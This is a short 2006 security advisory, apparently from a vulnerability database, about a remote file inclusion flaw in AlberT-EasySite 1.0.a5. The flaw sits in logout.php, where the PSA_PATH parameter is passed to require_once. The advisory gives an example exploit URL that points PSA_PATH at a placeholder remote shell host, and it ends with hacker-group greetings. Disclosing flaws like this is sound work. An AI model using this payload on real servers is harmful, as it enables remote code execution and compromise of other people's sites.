AlberT-EasySite <= 1.0.a5 Remote File Inclusion

2006-10-12T00:00:00
ID SECURITYVULNS:DOC:14644
Type securityvulns
Reporter Securityvulns
Modified 2006-10-12T00:00:00

Description

AlberT-EasySite <= 1.0.a5 Remote File Inclusion

Download Source : http://www.superalbert.it/download/AlberT-EasySite/AES_1.0a5.tar.gz

Found By : k1tk4t - k1tk4t[4t]newhack.org

Location : Indonesia -- #newhack[dot]org

file ; logout.php

bugs ; require_once $PSA_PATH.'/include/config.php';

exmple and methode exploit ; http://localhost/AlberT-EasySite/AES/modules/auth/phpsecurityadmin/include/logout.php?PSA_PATH=http://shell/cmd.do?

Thanks; str0ke milw0rm google

e-c-h-o (all member echo community)

nyubicrew (all member solpotcrew community)

person; y3dips, lirva32, the_day,(&all echo staff) illibero,NoGe(all member asiahacker), nyubi,x-ace,ghoz,home_edition2001,matdhule,iFX,and for all(friend's&enemy)